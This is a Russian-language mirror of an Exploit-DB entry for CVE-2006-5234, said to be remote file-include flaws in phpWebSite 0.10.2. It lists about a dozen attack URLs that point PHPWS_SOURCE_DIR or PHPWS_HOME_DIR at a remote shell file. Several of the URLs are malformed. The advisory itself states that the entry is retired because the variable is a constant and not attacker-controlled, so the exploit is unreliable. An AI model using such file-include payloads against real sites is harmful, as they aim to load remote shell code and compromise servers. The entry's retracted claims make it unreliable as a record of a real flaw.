- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 28774
- Проверка EDB
-
- Пройдено
- Автор
- CRACKERS_CHILD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5234
- Дата публикации
- 2006-10-09
Код:
source: https://www.securityfocus.com/bid/20412/info
phpWebSite is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying system; other attacks are also possible.
phpWebSite version 0.10.2 is vulnerable to this issue; other versions may also be affected.
This BID is being retired. The 'PHPWS_SOURCE_DIR' is a constant and not an attacker-controlled variable.
http://www.example.com/mod/users/init.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/users.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/Cookie.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/forms.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/Groups.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/mod/users/class/http://www.example.com/modSetting.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/Calendar.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/DateTime.php?PHPWS_HOME_DIR=http://Shel3ll.txt?
http://www.example.com/core/http://www.example.com/core.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/ImgLibrary.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/Manager.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/Template.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
http://www.example.com/core/EZform.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?
- Источник
- www.exploit-db.com